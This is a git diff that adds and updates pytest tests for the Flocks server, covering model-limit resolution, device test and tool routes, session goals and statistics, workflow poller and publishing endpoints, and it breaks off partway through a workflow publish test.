+            {"chat_template_kwargs": {"enable_thinking": True}},
+            {"chat_template_kwargs": {"thinking": True}},
+        ],
+    )
+    def test_configured_extra_body_overrides_auto_generic_shape(
+        self,
+        configured_extra_body: Dict[str, Any],
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """OpenAI-compatible users can declare provider-specific request bodies.
+
+        vLLM/SGLang thinking switches are nested under
+        ``chat_template_kwargs``.  If configured, Flocks should forward the
+        exact shape instead of adding its default ``enable_thinking`` flag for
+        qwen-style generic chat models.
+        """
+        monkeypatch.setattr(
+            provider_options,
+            "_resolve_default_extra_body",
+            lambda *_args, **_kw: configured_extra_body,
+        )
+
+        options = provider_options.build_provider_options(
+            "openai-compatible",
+            "qwen3-7b",
+            resolve_max_tokens=False,
+        )
+
+        assert options.get("extra_body") == configured_extra_body
+
+    @pytest.mark.parametrize(
+        "configured_extra_body",
+        [
+            {"chat_template_kwargs": {"enable_thinking": True}},
+            {"chat_template_kwargs": {"thinking": True}},
+        ],
+    )
+    def test_configured_extra_body_emits_without_interleaved_inference(
+        self,
+        configured_extra_body: Dict[str, Any],
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """Explicit extra_body config should not depend on model-name inference."""
+        monkeypatch.setattr(
+            provider_options,
+            "_resolve_default_extra_body",
+            lambda *_args, **_kw: configured_extra_body,
+        )
+        monkeypatch.setattr(
+            provider_options,
+            "_resolve_interleaved_capability",
+            lambda *_args, **_kw: None,
+        )
+
+        options = provider_options.build_provider_options(
+            "openai-compatible",
+            "local-sglang-model",
+            resolve_max_tokens=False,
+        )
+
+        assert options.get("extra_body") == configured_extra_body
+
     def test_anthropic_transport_still_uses_thinking_field(
         self, monkeypatch: pytest.MonkeyPatch
     ) -> None:
diff --git a/tests/server/routes/test_custom_provider_runtime.py b/tests/server/routes/test_custom_provider_runtime.py
index 4899ce6ea..0a66aeea2 100644
--- a/tests/server/routes/test_custom_provider_runtime.py
+++ b/tests/server/routes/test_custom_provider_runtime.py
@@ -1,6 +1,16 @@
+import os
+from types import SimpleNamespace
+
+import pytest
+
 from flocks.provider.provider import ModelCapabilities, ModelInfo, Provider
 from flocks.provider.sdk.azure import AzureProvider
-from flocks.server.routes.custom_provider import CreateModelReq, _add_model_to_runtime
+from flocks.server.routes import custom_provider
+from flocks.server.routes.custom_provider import (
+    CreateModelReq,
+    _add_model_to_runtime,
+    _resolve_model_limits,
+)
 
 
 def test_model_info_pricing_accepts_currency_string():
@@ -81,3 +91,231 @@ def test_add_azure_deployment_to_runtime_config_models(monkeypatch):
         assert provider._config_models[0].name == "Customer Production Deployment"
     finally:
         Provider._models = original_models
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_uses_explicit_values():
+    body = CreateModelReq(
+        model_id="gpt-explicit",
+        name="GPT Explicit",
+        context_window=64000,
+        max_output_tokens=16000,
+    )
+
+    resolved = await _resolve_model_limits("custom-openai", body, {"models": {}})
+
+    assert resolved.context_window == 64000
+    assert resolved.max_output_tokens == 16000
+    assert resolved.source == "explicit"
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_uses_existing_provider_config():
+    body = CreateModelReq(model_id="known-model", name="Known Model")
+
+    resolved = await _resolve_model_limits(
+        "custom-openai",
+        body,
+        {
+            "models": {
+                "known-model": {
+                    "context_window": 200000,
+                    "max_output_tokens": 32000,
+                },
+            },
+        },
+    )
+
+    assert resolved.context_window == 200000
+    assert resolved.max_output_tokens == 32000
+    assert resolved.source == "catalog"
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_uses_flocks_catalog(monkeypatch):
+    body = CreateModelReq(model_id="catalog-model", name="Catalog Model")
+    model_def = SimpleNamespace(
+        id="catalog-model",
+        limits=SimpleNamespace(
+            context_window=131072,
+            max_output_tokens=8192,
+        ),
+        capabilities=None,
+    )
+
+    monkeypatch.setattr(
+        "flocks.provider.model_catalog.get_provider_model_definitions",
+        lambda provider_id: [model_def],
+    )
+
+    resolved = await _resolve_model_limits("openai", body, {"models": {}})
+
+    assert resolved.context_window == 131072
+    assert resolved.max_output_tokens == 8192
+    assert resolved.source == "catalog"
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_uses_models_dev(monkeypatch):
+    body = CreateModelReq(model_id="gpt-models-dev", name="GPT Models Dev")
+
+    async def fake_fetch_models_dev():
+        return {
+            "openai": {
+                "models": {
+                    "gpt-models-dev": {
+                        "limit": {
+                            "context": 128000,
+                            "output": 16384,
+                        },
+                    },
+                },
+            },
+        }
+
+    monkeypatch.setattr(custom_provider, "_fetch_models_dev", fake_fetch_models_dev)
+
+    resolved = await _resolve_model_limits("custom-openai", body, {"models": {}})
+
+    assert resolved.context_window == 128000
+    assert resolved.max_output_tokens == 16384
+    assert resolved.source == "models_dev"
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_uses_models_dev_model_prefix(monkeypatch):
+    body = CreateModelReq(
+        model_id="deepseek:deepseek-v4-flash",
+        name="DeepSeek V4 Flash",
+    )
+
+    async def fake_fetch_models_dev():
+        return {
+            "deepseek": {
+                "models": {
+                    "deepseek-v4-flash": {
+                        "limit": {
+                            "context": 1000000,
+                            "output": 384000,
+                        },
+                    },
+                },
+            },
+        }
+
+    monkeypatch.setattr(custom_provider, "_fetch_models_dev", fake_fetch_models_dev)
+
+    resolved = await _resolve_model_limits("custom-tb-local", body, {"models": {}})
+
+    assert resolved.context_window == 1000000
+    assert resolved.max_output_tokens == 384000
+    assert resolved.source == "models_dev"
+
+
+@pytest.mark.asyncio
+@pytest.mark.parametrize(
+    ("provider_id", "model_id", "expected_context", "expected_output", "expected_source"),
+    [
+        ("custom-deepseek", "deepseek-v4", 128000, 8192, "fallback"),
+        ("custom-deepseek", "deepseek-v4-flash", 1000000, 384000, "models_dev"),
+        ("custom-anything", "deepseek:deepseek-v4-flash", 1000000, 384000, "models_dev"),
+        ("custom-bailian", "bailian:deepseek-v4-flash", 128000, 8192, "fallback"),
+        ("openrouter", "deepseek/deepseek-v4-flash", 1048576, 131072, "models_dev"),
+    ],
+)
+async def test_resolve_model_limits_auto_detects_common_model_inputs(
+    monkeypatch,
+    provider_id,
+    model_id,
+    expected_context,
+    expected_output,
+    expected_source,
+):
+    body = CreateModelReq(model_id=model_id, name=model_id)
+
+    async def fake_fetch_models_dev():
+        return {
+            "deepseek": {
+                "models": {
+                    "deepseek-v4-flash": {
+                        "limit": {
+                            "context": 1000000,
+                            "output": 384000,
+                        },
+                    },
+                    "deepseek-v4-pro": {
+                        "limit": {
+                            "context": 1000000,
+                            "output": 384000,
+                        },
+                    },
+                },
+            },
+            "alibaba": {"models": {}},
+            "openrouter": {
+                "models": {
+                    "deepseek/deepseek-v4-flash": {
+                        "limit": {
+                            "context": 1048576,
+                            "output": 131072,
+                        },
+                    },
+                },
+            },
+        }
+
+    monkeypatch.setattr(custom_provider, "_fetch_models_dev", fake_fetch_models_dev)
+
+    resolved = await _resolve_model_limits(provider_id, body, {"models": {}})
+
+    assert resolved.context_window == expected_context
+    assert resolved.max_output_tokens == expected_output
+    assert resolved.source == expected_source
+
+
+@pytest.mark.live
+@pytest.mark.skipif(
+    os.environ.get("FLOCKS_LIVE_TEST") != "1",
+    reason="requires live models.dev network access",
+)
+@pytest.mark.asyncio
+@pytest.mark.parametrize(
+    ("provider_id", "model_id", "expected_context", "expected_output", "expected_source"),
+    [
+        ("custom-deepseek", "deepseek-v4", 128000, 8192, "fallback"),
+        ("custom-deepseek", "deepseek-v4-flash", 1000000, 384000, "models_dev"),
+        ("custom-anything", "deepseek:deepseek-v4-flash", 1000000, 384000, "models_dev"),
+        ("custom-bailian", "bailian:deepseek-v4-flash", 128000, 8192, "fallback"),
+        ("openrouter", "deepseek/deepseek-v4-flash", 1048576, 131072, "models_dev"),
+    ],
+)
+async def test_resolve_model_limits_live_models_dev_auto_detects_current_inputs(
+    provider_id,
+    model_id,
+    expected_context,
+    expected_output,
+    expected_source,
+):
+    body = CreateModelReq(model_id=model_id, name=model_id)
+
+    resolved = await _resolve_model_limits(provider_id, body, {"models": {}})
+
+    assert resolved.context_window == expected_context
+    assert resolved.max_output_tokens == expected_output
+    assert resolved.source == expected_source
+
+
+@pytest.mark.asyncio
+async def test_resolve_model_limits_falls_back_when_models_dev_unavailable(monkeypatch):
+    body = CreateModelReq(model_id="unknown-model", name="Unknown Model")
+
+    async def fake_fetch_models_dev():
+        return None
+
+    monkeypatch.setattr(custom_provider, "_fetch_models_dev", fake_fetch_models_dev)
+
+    resolved = await _resolve_model_limits("custom-openai", body, {"models": {}})
+
+    assert resolved.context_window == custom_provider.FALLBACK_CONTEXT_WINDOW
+    assert resolved.max_output_tokens == custom_provider.FALLBACK_MAX_OUTPUT_TOKENS
+    assert resolved.source == "fallback"
diff --git a/tests/server/routes/test_device_routes.py b/tests/server/routes/test_device_routes.py
index 13abfca55..b18200fdf 100644
--- a/tests/server/routes/test_device_routes.py
+++ b/tests/server/routes/test_device_routes.py
@@ -13,13 +13,17 @@
 from __future__ import annotations
 
 import json
+from types import SimpleNamespace
 from typing import Dict, Optional
+from unittest.mock import AsyncMock
 
 import pytest
 from httpx import AsyncClient
 
 from flocks.server.routes import device as device_routes
+from flocks.tool.device import intake as device_intake
 from flocks.tool.device.models import DeviceTestResult
+from flocks.tool.registry import ToolCategory, ToolInfo
 
 
 def _fake_row(*, fields: Dict[str, str], verify_ssl: bool = False) -> dict:
@@ -43,8 +47,7 @@ def _install_route_stubs(
     probe_result: DeviceTestResult,
     captured: dict,
 ) -> None:
-    """Stub out fetch_device, _probe and record_test_result on the
-    routes module so the test stays isolated from DB / network."""
+    """Stub out intake dependencies so the test stays isolated from DB / network."""
 
     async def fake_fetch_device(device_id: str):
         captured["device_id"] = device_id
@@ -60,13 +63,13 @@ async def fake_record(device_id, *, success, message, latency_ms):
             {"device_id": device_id, "success": success, "message": message}
         )
 
-    monkeypatch.setattr(device_routes, "fetch_device", fake_fetch_device)
-    monkeypatch.setattr(device_routes, "_probe", fake_probe)
-    monkeypatch.setattr(device_routes, "record_test_result", fake_record)
+    monkeypatch.setattr(device_intake, "fetch_device", fake_fetch_device)
+    monkeypatch.setattr(device_intake, "_probe", fake_probe)
+    monkeypatch.setattr(device_intake, "record_test_result", fake_record)
     # secrets resolution: return the persisted dict untouched so tests can
     # drive the field values directly.
     monkeypatch.setattr(
-        device_routes,
+        device_intake,
         "resolve_for_runtime",
         lambda db_fields: dict(db_fields),
     )
@@ -156,6 +159,81 @@ async def test_form_override_base_url_wins_over_persisted_host(
         assert resp.status_code == 200, resp.text
         assert captured["probed_base_url"] == "https://staging.example.com"
 
+    @pytest.mark.asyncio
+    async def test_draft_fields_win_over_persisted_fields_for_probe(
+        self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
+    ):
+        captured: dict = {}
+        _install_route_stubs(
+            monkeypatch,
+            row=_fake_row(fields={"base_url": "https://persisted.example.com"}),
+            probe_result=DeviceTestResult(success=True, message="ok"),
+            captured=captured,
+        )
+
+        resp = await client.post(
+            "/api/devices/dev-test/test",
+            json={"fields": {"base_url": "https://draft.example.com"}},
+        )
+
+        assert resp.status_code == 200, resp.text
+        assert captured["probed_base_url"] == "https://draft.example.com"
+        assert captured["record_calls"] == [
+            {"device_id": "dev-test", "success": True, "message": "ok"}
+        ]
+
+    @pytest.mark.asyncio
+    async def test_masked_draft_secret_keeps_persisted_secret(
+        self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
+    ):
+        captured: dict = {}
+        _install_route_stubs(
+            monkeypatch,
+            row=_fake_row(
+                fields={
+                    "base_url": "https://persisted.example.com",
+                    "password": "{secret:device_dev-test_password}",
+                }
+            ),
+            probe_result=DeviceTestResult(success=True, message="ok"),
+            captured=captured,
+        )
+        monkeypatch.setattr(
+            device_intake,
+            "resolve_for_runtime",
+            lambda db_fields: {
+                **db_fields,
+                "password": "real-password",
+            },
+        )
+        monkeypatch.setattr(
+            device_intake,
+            "mask_for_display",
+            lambda db_fields: (
+                {
+                    "base_url": "https://persisted.example.com",
+                    "password": "r***word",
+                },
+                {"base_url": True, "password": True},
+            ),
+        )
+
+        resolved = device_intake._resolve_test_fields(
+            {
+                "base_url": "https://persisted.example.com",
+                "password": "{secret:device_dev-test_password}",
+            },
+            device_intake.DeviceTestRequest(fields={"password": "r***word"}),
+        )
+        resp = await client.post(
+            "/api/devices/dev-test/test",
+            json={"fields": {"password": "r***word"}},
+        )
+
+        assert resp.status_code == 200, resp.text
+        assert resolved["password"] == "real-password"
+        assert captured["probed_base_url"] == "https://persisted.example.com"
+
     @pytest.mark.asyncio
     async def test_error_message_mentions_both_base_url_and_host(
         self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
@@ -192,7 +270,7 @@ async def test_returns_404_for_unknown_device(
         async def fake_fetch_device(device_id: str):
             return None
 
-        monkeypatch.setattr(device_routes, "fetch_device", fake_fetch_device)
+        monkeypatch.setattr(device_intake, "fetch_device", fake_fetch_device)
 
         resp = await client.post("/api/devices/missing-id/test", json={})
 
@@ -258,3 +336,163 @@ async def fake_fetch_device(device_id: str):
         resp = await client.post("/api/devices/missing-id/credentials", json={})
 
         assert resp.status_code == 404
+
+
+class TestDeviceToolEndpoint:
+    @staticmethod
+    def _tool(*, enabled: bool = True):
+        return SimpleNamespace(
+            info=ToolInfo(
+                name="onesig_login",
+                description="OneSIG login",
+                category=ToolCategory.CUSTOM,
+                enabled=enabled,
+                source="device",
+                provider="onesig_api_v2_5_3_D20260321",
+            )
+        )
+
+    @pytest.mark.asyncio
+    async def test_enable_deletes_per_device_override_without_writing_true(
+        self, monkeypatch: pytest.MonkeyPatch
+    ):
+        calls: dict[str, object] = {}
+        tool = self._tool(enabled=True)
+
+        async def fake_delete(device_id: str, tool_name: str):
+            calls["delete"] = (device_id, tool_name)
+            return True
+
+        async def fake_set(device_id: str, tool_name: str, enabled: bool):
+            calls["set"] = (device_id, tool_name, enabled)
+
+        monkeypatch.setattr(
+            device_routes,
+            "fetch_device",
+            AsyncMock(return_value={"storage_key": "onesig_api_v2_5_3_D20260321"}),
+        )
+        monkeypatch.setattr("flocks.tool.registry.ToolRegistry.init", lambda: None)
+        monkeypatch.setattr("flocks.tool.registry.ToolRegistry.get", lambda _name: tool)
+        monkeypatch.setattr(device_routes, "delete_device_tool_setting", fake_delete)
+        monkeypatch.setattr(device_routes, "set_device_tool_enabled", fake_set)
+
+        result = await device_routes.route_update_device_tool(
+            "dev-a",
+            "onesig_login",
+            device_routes.DeviceToolUpdateRequest(enabled=True),
+        )
+
+        assert calls["delete"] == ("dev-a", "onesig_login")
+        assert "set" not in calls
+        assert result.enabled_global is True
+        assert result.enabled_device is None
+        assert result.enabled_effective is True
+
+    @pytest.mark.asyncio
+    async def test_enable_global_tool_when_device_tool_enabled(
+        self, monkeypatch: pytest.MonkeyPatch
+    ):
+        calls: dict[str, object] = {}
+        tool = self._tool(enabled=False)
+
+        async def fake_delete(device_id: str, tool_name: str):
+            calls["delete"] = (device_id, tool_name)
+            return False
+
+        def fake_global_enable(target_tool, desired: bool):
+            calls["global_enable"] = (target_tool.info.name, desired)
+            target_tool.info.enabled = desired
+            return desired
+
+        monkeypatch.setattr(
+            device_routes,
+            "fetch_device",
+            AsyncMock(return_value={"storage_key": "onesig_api_v2_5_3_D20260321"}),
+        )
+        monkeypatch.setattr("flocks.tool.registry.ToolRegistry.init", lambda: None)
+        monkeypatch.setattr("flocks.tool.registry.ToolRegistry.get", lambda _name: tool)
+        monkeypatch.setattr(device_routes, "delete_device_tool_setting", fake_delete)
+        monkeypatch.setattr(
+            "flocks.server.routes.tool._set_global_tool_enabled",
+            fake_global_enable,
+        )
+
+        result = await device_routes.route_update_device_tool(
+            "dev-a",
+            "onesig_login",
+            device_routes.DeviceToolUpdateRequest(enabled=True),
+        )
+
+        assert calls["global_enable"] == ("onesig_login", True)
+        assert calls["delete"] == ("dev-a", "onesig_login")
+        assert result.enabled_global is True
+        assert result.enabled_device is None
+        assert result.enabled_effective is True
+
+
+class TestDeviceSyncEndpoint:
+    @pytest.mark.asyncio
+    async def test_list_devices_does_not_invoke_auto_instance_creation(
+        self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
+    ):
+        async def fail_ensure_user_device_instances(*, refresh_templates: bool):
+            raise AssertionError("GET /api/devices must stay read-only")
+
+        monkeypatch.setattr(
+            device_routes,
+            "ensure_user_device_instances",
+            fail_ensure_user_device_instances,
+        )
+        async def fake_list_devices(group_id=None):
+            return []
+
+        monkeypatch.setattr(device_routes, "list_devices", fake_list_devices)
+
+        resp = await client.get("/api/devices?refresh=true")
+
+        assert resp.status_code == 200, resp.text
+        assert resp.json() == []
+
+    @pytest.mark.asyncio
+    async def test_sync_invokes_auto_instance_creation_with_refresh_flag(
+        self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
+    ):
+        captured: dict = {}
+
+        async def fake_ensure_user_device_instances(*, refresh_templates: bool):
+            captured["refresh_templates"] = refresh_templates
+            return 3
+
+        monkeypatch.setattr(
+            device_routes,
+            "ensure_user_device_instances",
+            fake_ensure_user_device_instances,
+        )
+
+        resp = await client.post("/api/devices/sync?refresh=true")
+
+        assert resp.status_code == 200, resp.text
+        assert resp.json() == {"created": 3}
+        assert captured["refresh_templates"] is True
+
+    @pytest.mark.asyncio
+    async def test_sync_allows_non_refresh_sync(
+        self, client: AsyncClient, monkeypatch: pytest.MonkeyPatch
+    ):
+        captured: dict = {}
+
+        async def fake_ensure_user_device_instances(*, refresh_templates: bool):
+            captured["refresh_templates"] = refresh_templates
+            return 0
+
+        monkeypatch.setattr(
+            device_routes,
+            "ensure_user_device_instances",
+            fake_ensure_user_device_instances,
+        )
+
+        resp = await client.post("/api/devices/sync?refresh=false")
+
+        assert resp.status_code == 200, resp.text
+        assert resp.json() == {"created": 0}
+        assert captured["refresh_templates"] is False
diff --git a/tests/server/routes/test_remaining_routes.py b/tests/server/routes/test_remaining_routes.py
index 863147831..f36aa98b3 100644
--- a/tests/server/routes/test_remaining_routes.py
+++ b/tests/server/routes/test_remaining_routes.py
@@ -224,6 +224,30 @@ async def test_update_workflow(self, client: AsyncClient):
         assert resp.status_code == status.HTTP_200_OK
         assert resp.json()["name"] == "updated-workflow"
 
+    @pytest.mark.asyncio
+    async def test_update_workflow_writes_workflow_md_only(
+        self,
+        client: AsyncClient,
+        isolated_workflow_filesystem,
+    ):
+        """PUT /api/workflow/{id} stores editable markdown in workflow.md."""
+        create_resp = await client.post("/api/workflow", json=_WORKFLOW_PAYLOAD)
+        wf_id = create_resp.json()["id"]
+        workflow_dir = isolated_workflow_filesystem["global_root"] / wf_id
+        legacy_edit_file = workflow_dir / "workflow.edit.md"
+        legacy_edit_file.write_text("# legacy\n", encoding="utf-8")
+
+        resp = await client.put(
+            f"/api/workflow/{wf_id}",
+            json={"markdownContent": "# current\n"},
+        )
+
+        assert resp.status_code == status.HTTP_200_OK, resp.text
+        assert resp.json()["markdownContent"] == "# current\n"
+        assert resp.json()["editMarkdownContent"] == "# current\n"
+        assert (workflow_dir / "workflow.md").read_text(encoding="utf-8") == "# current\n"
+        assert not legacy_edit_file.exists()
+
     @pytest.mark.asyncio
     async def test_delete_workflow(self, client: AsyncClient):
         """DELETE /api/workflow/{id} removes the workflow."""
diff --git a/tests/server/routes/test_session_routes.py b/tests/server/routes/test_session_routes.py
index 39ae2765b..c7977be9c 100644
--- a/tests/server/routes/test_session_routes.py
+++ b/tests/server/routes/test_session_routes.py
@@ -65,6 +65,24 @@ async def test_create_session_with_category(self, client: AsyncClient):
         assert resp.status_code == status.HTTP_200_OK
         assert resp.json()["category"] == "workflow"
 
+    @pytest.mark.asyncio
+    async def test_get_session_includes_persisted_goal(self, client: AsyncClient):
+        """GET /api/session/{id} hydrates persisted goal state for the WebUI."""
+        from flocks.session.goal import GoalManager
+
+        create_resp = await client.post("/api/session", json={"title": "Goal Session"})
+        assert create_resp.status_code == status.HTTP_200_OK
+        session_id = create_resp.json()["id"]
+        await GoalManager.set_goal(session_id, "List built-in tools")
+
+        resp = await client.get(f"/api/session/{session_id}")
+        assert resp.status_code == status.HTTP_200_OK
+        assert resp.json()["goal"] == {
+            "status": "active",
+            "objective": "List built-in tools",
+            "reason": None,
+        }
+
     @pytest.mark.asyncio
     async def test_list_sessions_empty(self, client: AsyncClient):
         """GET /api/session returns an empty list when no sessions exist."""
@@ -367,6 +385,42 @@ async def test_non_owner_cannot_change_share_or_continue_session(
 
 
 class TestSessionMessagesRemaining:
+    @pytest.mark.asyncio
+    @pytest.mark.parametrize(
+        ("path_suffix", "payload"),
+        [
+            ("/message", {"parts": [{"type": "text", "text": "blocked"}], "agent": "disabled-agent"}),
+            ("/prompt_async", {"parts": [{"type": "text", "text": "blocked"}], "agent": "disabled-agent"}),
+            ("/prompt_queue", {"parts": [{"type": "text", "text": "blocked"}], "agent": "disabled-agent"}),
+            ("/command", {"command": "help", "agent": "disabled-agent"}),
+        ],
+    )
+    async def test_input_routes_reject_disabled_agents(
+        self,
+        client: AsyncClient,
+        session_id: str,
+        monkeypatch: pytest.MonkeyPatch,
+        path_suffix: str,
+        payload: dict,
+    ):
+        """Disabled subagents cannot be used through direct session input APIs."""
+        monkeypatch.setattr(
+            "flocks.agent.registry.Agent.get",
+            AsyncMock(return_value=SimpleNamespace(
+                name="disabled-agent",
+                mode="subagent",
+                delegatable=False,
+                hidden=False,
+                tags=[],
+                model=None,
+            )),
+        )
+
+        resp = await client.post(f"/api/session/{session_id}{path_suffix}", json=payload)
+
+        assert resp.status_code == status.HTTP_400_BAD_REQUEST
+        assert resp.json()["message"] == 'Agent "disabled-agent" is disabled'
+
     @pytest.mark.asyncio
     async def test_send_message_empty_parts_returns_success(
         self, client: AsyncClient, session_id: str
@@ -943,17 +997,25 @@ class TestSessionUtilities:
     @pytest.mark.asyncio
     async def test_clear_session(self, client: AsyncClient, session_id: str):
         """POST /api/session/{id}/clear removes messages."""
+        from flocks.session.goal import GoalManager
+
         # Add a message first
         await client.post(
             f"/api/session/{session_id}/message",
             json={"parts": [{"type": "text", "text": "msg"}], "noReply": True},
         )
+        await GoalManager.set_goal(session_id, "List built-in tools")
         clear_resp = await client.post(f"/api/session/{session_id}/clear")
         assert clear_resp.status_code == status.HTTP_200_OK
 
         # Messages should be gone
         list_resp = await client.get(f"/api/session/{session_id}/message")
         assert list_resp.json() == []
+        assert await GoalManager.get(session_id) is None
+
+        session_resp = await client.get(f"/api/session/{session_id}")
+        assert session_resp.status_code == status.HTTP_200_OK
+        assert session_resp.json()["goal"] is None
 
     @pytest.mark.asyncio
     async def test_clear_session_clears_prompt_queue(self, client: AsyncClient, session_id: str):
@@ -1045,6 +1107,26 @@ async def test_abort_session(self, client: AsyncClient, session_id: str):
         resp = await client.post(f"/api/session/{session_id}/abort")
         assert resp.status_code == status.HTTP_200_OK
 
+    @pytest.mark.asyncio
+    async def test_session_statistics(self, client: AsyncClient, session_id: str):
+        """GET /api/session/{id}/statistics reports stored session messages."""
+        payload = {
+            "parts": [{"type": "text", "text": "Hello from statistics"}],
+            "noReply": True,
+        }
+        message_resp = await client.post(f"/api/session/{session_id}/message", json=payload)
+        assert message_resp.status_code == status.HTTP_200_OK
+
+        resp = await client.get(f"/api/session/{session_id}/statistics")
+        assert resp.status_code == status.HTTP_200_OK
+
+        data = resp.json()
+        assert data["sessionID"] == session_id
+        assert data["messageCount"] == 1
+        assert data["tokenCount"] >= 3
+        assert data["toolCallCount"] == 0
+        assert data["durationSeconds"] >= 0
+
     @pytest.mark.asyncio
     async def test_session_status(self, client: AsyncClient):
         """GET /api/session/status returns aggregate status."""
diff --git a/tests/server/routes/test_user_defined_pages_routes.py b/tests/server/routes/test_user_defined_pages_routes.py
index 8d35ec577..686a10d33 100644
--- a/tests/server/routes/test_user_defined_pages_routes.py
+++ b/tests/server/routes/test_user_defined_pages_routes.py
@@ -83,9 +83,17 @@ async def test_save_source_triggers_build_and_event(client: AsyncClient, user_de
 @pytest.mark.asyncio
 async def test_bundle_endpoint_available_after_create(client: AsyncClient, user_defined_pages_env: UserDefinedPagesStore):
     await client.post("/api/user-defined-pages", json={"id": "empty-page", "title": "空页面"})
+    bundle_path = user_defined_pages_env.bundle_path("empty-page")
+    bundle_path.parent.mkdir(parents=True, exist_ok=True)
+    bundle_path.write_text("export default function Page(){return null;}", encoding="utf-8")
+    user_defined_pages_env.write_build_meta(
+        "empty-page",
+        UserDefinedPageBuildMeta(status="ready", hash="test-hash", builtAt=1),
+    )
     bundle_resp = await client.get("/api/user-defined-pages/empty-page/bundle.js")
     assert bundle_resp.status_code == 200
     assert "application/javascript" in bundle_resp.headers.get("content-type", "")
+    assert "content-disposition" not in bundle_resp.headers
     assert bundle_resp.text.strip()
 
 
diff --git a/tests/server/routes/test_workflow_poller_routes.py b/tests/server/routes/test_workflow_poller_routes.py
index 9baf2d2dc..ff8679fd2 100644
--- a/tests/server/routes/test_workflow_poller_routes.py
+++ b/tests/server/routes/test_workflow_poller_routes.py
@@ -56,6 +56,64 @@ async def _fake_restart(workflow_id: str) -> dict[str, Any]:
     assert payload["inputs"] == {"persist_triage_output": True}
 
 
+@pytest.mark.asyncio  # Saving a poller config with a cron expression must keep it in storage and in the schedule trigger.
+async def test_save_poller_config_preserves_cron_schedule(
+    client: AsyncClient,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    writes: list[tuple[str, dict[str, Any]]] = []  # (key, value) pairs captured from Storage.write
+    persisted_sources: list[dict[str, Any]] = []  # `source` dicts of the schedule triggers passed to persist
+
+    async def _fake_write(key: Any, value: dict[str, Any]) -> None:
+        writes.append((key, value))
+
+    async def _fake_persist(
+        _workflow_id: str,
+        _workflow_data: dict[str, Any],
+        triggers: list[Any],
+    ) -> None:
+        persisted_sources.extend(dict(trigger.source or {}) for trigger in triggers if trigger.type == "schedule")  # copy each source
+
+    async def _fake_restart(workflow_id: str) -> dict[str, Any]:
+        assert workflow_id == "wf-1"
+        return {"workflowId": workflow_id, "state": "running", "cronExpression": "*/10 * * * *"}
+
+    monkeypatch.setattr(
+        workflow_routes,
+        "_read_workflow_from_fs",
+        lambda workflow_id: {"workflowJson": {"start": "n1", "nodes": [], "edges": []}} if workflow_id == "wf-1" else None,  # only wf-1 exists
+    )
+    monkeypatch.setattr(workflow_routes.Storage, "write", _fake_write)
+    monkeypatch.setattr(workflow_routes, "_persist_workflow_triggers", _fake_persist)
+    monkeypatch.setattr(
+        "flocks.workflow.poller_manager.default_manager",
+        SimpleNamespace(restart_workflow=_fake_restart),  # stand-in manager exposing only restart_workflow
+    )
+
+    response = await client.post(
+        "/api/workflow/wf-1/poller-config",
+        json={
+            "enabled": True,
+            "intervalSeconds": 300,
+            "cronExpression": "*/10 * * * *",
+            "timeoutSeconds": 3600,
+            "noOverlap": True,
+            "inputs": {"source": "cron"},
+        },
+    )
+
+    assert response.status_code == 200, response.text
+    poller_payload = next(value for key, value in writes if key == "workflow_poller_config/wf-1")  # StopIteration if never written
+    assert poller_payload["cronExpression"] == "*/10 * * * *"
+    assert persisted_sources == [  # exactly one schedule trigger, in cron mode, with interval and cron both kept
+        {
+            "mode": "cron",
+            "intervalSeconds": 300,
+            "cron": "*/10 * * * *",
+        }
+    ]
+
+
 @pytest.mark.asyncio
 async def test_get_poller_config_returns_saved_data(
     client: AsyncClient,
diff --git a/tests/server/routes/test_workflow_publish_api.py b/tests/server/routes/test_workflow_publish_api.py
new file mode 100644
index 000000000..8ac6afc40
--- /dev/null
+++ b/tests/server/routes/test_workflow_publish_api.py
@@ -0,0 +1,344 @@
+from __future__ import annotations
+
+from typing import Any
+
+import pytest
+
+from flocks.server.routes import workflow as workflow_routes
+
+
+@pytest.mark.asyncio  # Publishing a workflow that already has a stored apiKey must hand that key to publish_workflow.
+async def test_publish_workflow_as_api_reuses_key_for_runtime(
+    monkeypatch: pytest.MonkeyPatch,
+    tmp_path,
+) -> None:
+    workflow_id = "wf-1"
+    existing_key = "existing-api-key"
+    publish_calls: list[dict[str, Any]] = []  # arguments of every fake publish_workflow call
+    writes: dict[str, Any] = {}  # last value written per storage key
+
+    monkeypatch.setattr(
+        workflow_routes,
+        "_read_workflow_from_fs",
+        lambda requested_id: {
+            "id": requested_id,
+            "name": "Demo Workflow",
+            "workflowJson": {
+                "id": requested_id,
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "outputs['ok'] = True"}],
+                "edges": [],
+            },
+        } if requested_id == workflow_id else None,  # any other id is reported as missing
+    )
+    monkeypatch.setattr(workflow_routes.Config, "get_data_path", lambda: tmp_path)  # point the data path at pytest's tmp dir
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        if str(key) == workflow_routes._api_service_key(workflow_id):
+            return {"apiKey": existing_key}  # a previously stored service record holding the key
+        return None
+
+    async def fake_write(key: Any, value: Any) -> None:
+        writes[str(key)] = value
+
+    async def fake_publish_workflow(
+        requested_id: str,
+        image: str | None = None,
+        driver: str | None = None,
+        api_key: str | None = None,
+    ) -> dict[str, Any]:
+        publish_calls.append({
+            "workflow_id": requested_id,
+            "image": image,
+            "driver": driver,
+            "api_key": api_key,
+        })
+        return {
+            "serviceUrl": "http://127.0.0.1:19000",
+            "containerName": "local-wf-1",
+            "driver": driver or "local",
+            "apiKey": api_key,  # echo back whatever key the route supplied
+        }
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", fake_write)
+    monkeypatch.setattr(workflow_routes, "publish_workflow", fake_publish_workflow)
+
+    result = await workflow_routes.publish_workflow_as_api(  # the route function is called directly, not over HTTP
+        workflow_id,
+        workflow_routes.WorkflowCenterPublishRequest(driver="local"),
+    )
+
